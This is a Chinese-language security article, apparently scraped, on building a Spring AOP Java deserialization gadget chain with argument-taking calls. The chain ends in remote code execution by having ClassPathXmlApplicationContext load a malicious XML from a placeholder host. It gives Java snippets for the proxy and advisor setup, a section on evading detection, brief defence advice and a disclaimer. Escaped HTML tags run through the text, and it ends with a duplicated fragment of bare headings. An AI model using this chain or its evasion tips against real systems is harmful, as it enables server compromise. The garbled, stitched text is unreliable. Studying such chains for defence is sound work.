Spring AOP 反序列化有参调用利用链分析<\/h1>

一、背景概述<\/h2>
Spring AOP链是反序列化漏洞利用的重要技术，传统无参调用链存在局限性。本文分析通过有参方法调用的技术方案，重点解决`Hashtable.equals<\/code>触发Map.get<\/code>时的参数控制问题，实现更灵活的利用方式。<\/p>`

二、核心技术原理<\/h2>
2.1 有参调用优势<\/h3>

参数控制<\/strong>：有参方法调用允许控制传入参数，扩展利用场景<\/li>
返回值可控<\/strong>：通过Map.get<\/code>方法实现返回值控制<\/li>
规避限制<\/strong>：绕过无参调用的各种限制条件<\/li>
<\/ul>
2.2 关键触发点<\/h3>
\/\/ 通过hashtable.equals触发map.get
<\/span><\/span><\/span><\/span>Hashtable t =<\/span> new<\/span> Hashtable();<\/span>
<\/span><\/span>t.<\/span>put<\/span>(<\/span>"http:\/\/ip:6666\/spel.xml"<\/span>,<\/span> "\u1224\u0013\u0005\u000b"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>HashMap map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"aaa"<\/span>,<\/span> "test"<\/span>);<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>t,<\/span> "test"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2.3 Sink点选择<\/h3>
选择AnnotatedConstructor.call1<\/code>方法作为最终执行点，该方法的特性：<\/p>

只需要一个参数即可触发<\/li>
可调用构造函数<\/li>
适合用于触发ClassPathXmlApplicationContext<\/code>实现RCE<\/li>
<\/ul>
三、利用链构建详解<\/h2>
3.1 初始方案与问题<\/h3>
初始尝试基于无参调用POC修改，但遇到关键问题：<\/p>
问题1：提前触发<\/strong><\/p>
\/\/ 在调用t.get方法前会先调用t.size方法
<\/span><\/span><\/span>\/\/ 导致提前触发invoke，利用链断裂
<\/span><\/span><\/span><\/code><\/pre>问题2：方法不匹配<\/strong><\/p>

设置的target为AnnotatedConstructor<\/code>类<\/li>
该类没有size<\/code>方法，导致直接报错<\/li>
<\/ul>
3.2 解决方案：RegexpMethodPointcutAdvisor<\/h3>
3.2.1 正则匹配控制<\/h4>
RegexpMethodPointcutAdvisor re =<\/span> new<\/span> RegexpMethodPointcutAdvisor(<\/span>aspectJAroundAdvice);<\/span>
<\/span><\/span>re.<\/span>setPattern<\/span>(<\/span>".*get"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>通过设置正则模式.*get<\/code>，只对匹配的方法添加拦截器到调用链中，避免size<\/code>方法触发拦截。<\/p>
3.2.2 多层代理设计<\/h4>
采用target设置为Hashtable<\/code>的二次代理方案：<\/p>
优势：<\/strong><\/p>

避免hash碰撞问题<\/li>
自动触发hashCode<\/code>方法<\/li>
简化利用链构造<\/li>
<\/ul>
3.3 关键配置项<\/h3>
3.3.1 ReturningName设置<\/h4>
必须设置setReturningName<\/code>方法配置ReturningName属性为方法参数名：<\/p>
\/\/ 这是确保有参调用成功的关键配置
<\/span><\/span><\/span><\/span>setReturningName(<\/span>"参数名"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3.3.2 代理对象构造<\/h4>
\/\/ 使用Unsafe分配对象内存，避免构造函数调用
<\/span><\/span><\/span><\/span>public<\/span> static<\/span> <<\/span>T><\/span> T createObjWithoutConstructor<\/span>(<\/span>Class<<\/span>T><\/span> clazz)<\/span> {<\/span>
<\/span><\/span>    Field unsafeField =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>    unsafeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span> unsafeField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>    return<\/span> (<\/span>T)<\/span> unsafe.<\/span>allocateInstance<\/span>(<\/span>clazz);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3.3 AOP代理配置<\/h4>
\/\/ 配置AOP代理
<\/span><\/span><\/span><\/span>Class clazz0 =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>);<\/span>
<\/span><\/span>Constructor constructor0 =<\/span> clazz0.<\/span>getDeclaredConstructor<\/span>(<\/span>AdvisedSupport.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor0.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>DefaultIntroductionAdvisor decorator =<\/span> new<\/span> DefaultIntroductionAdvisor(<\/span>aspectJAroundAdvice);<\/span>
<\/span><\/span>
<\/span><\/span>AdvisedSupport advisedSupport1 =<\/span> new<\/span> AdvisedSupport();<\/span>
<\/span><\/span>advisedSupport1.<\/span>setTarget<\/span>(<\/span>an);<\/span> \/\/ 设置目标对象
<\/span><\/span><\/span><\/span>advisedSupport1.<\/span>addAdvisor<\/span>(<\/span>decorator);<\/span>
<\/span><\/span>
<\/span><\/span>AopProxy proxy =<\/span> (<\/span>AopProxy)<\/span> getProxy(<\/span>constructor0,<\/span> advisedSupport1,<\/span> new<\/span> Class[]{<\/span>AopProxy.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>});<\/span>
<\/span><\/span><\/code><\/pre>四、完整利用链流程<\/h2>

序列化触发<\/strong>：通过HashMap反序列化触发利用链<\/li>
Hashtable比较<\/strong>：触发equals方法调用<\/li>
Map.get调用<\/strong>：通过代理机制控制参数和返回值<\/li>
AOP拦截<\/strong>：RegexpMethodPointcutAdvisor过滤方法调用<\/li>
方法执行<\/strong>：最终触发AnnotatedConstructor.call1方法<\/li>
RCE实现<\/strong>：通过ClassPathXmlApplicationContext加载恶意配置<\/li>
<\/ol>
五、技术优势与应用<\/h2>
5.1 有参调用的价值<\/h3>

文件操作<\/strong>：支持写文件等需要参数的操作<\/li>
不出网利用<\/strong>：在限制网络的环境下仍可实现利用<\/li>
灵活性强<\/strong>：参数可控大大扩展了利用场景<\/li>
<\/ul>
5.2 规避检测<\/h3>

通过正则表达式控制方法拦截，减少异常行为<\/li>
多层代理设计增加分析难度<\/li>
利用Spring原生机制，特征不明显<\/li>
<\/ul>
六、防御建议<\/h2>

反序列化过滤<\/strong>：对反序列化操作进行严格管控<\/li>
AOP配置检查<\/strong>：检查不必要的AOP配置暴露<\/li>
依赖库管理<\/strong>：及时更新Spring框架版本<\/li>
输入验证<\/strong>：对所有输入数据进行严格验证<\/li>
安全审计<\/strong>：定期进行代码安全审计和漏洞扫描<\/li>
<\/ol>
七、总结<\/h2>
Spring AOP有参调用利用链通过精细的方法拦截控制和参数管理，实现了更灵活的反序列化漏洞利用方式。该技术方案解决了无参调用的局限性，特别适合需要参数控制的利用场景，如文件操作、不出网利用等。防御方面需要从反序列化管控、配置安全等多个层面进行防护。<\/p>

注<\/strong>：本文仅用于安全研究和技术防御目的，严禁用于非法用途。<\/p>

Spring AOP 反序列化有参调用利用链分析<\/h1>

一、背景概述<\/h2> Spring AOP链是反序列化漏洞利用的重要技术，传统无参调用链存在局限性。本文分析通过有参方法调用的技术方案，重点解决Hashtable.equals<\/code>触发Map.get<\/code>时的参数控制问题，实现更灵活的利用方式。<\/p>

三、利用链构建详解<\/h2>

3.2 解决方案：RegexpMethodPointcutAdvisor<\/h3>

3.3 关键配置项<\/h3>

五、技术优势与应用<\/h2>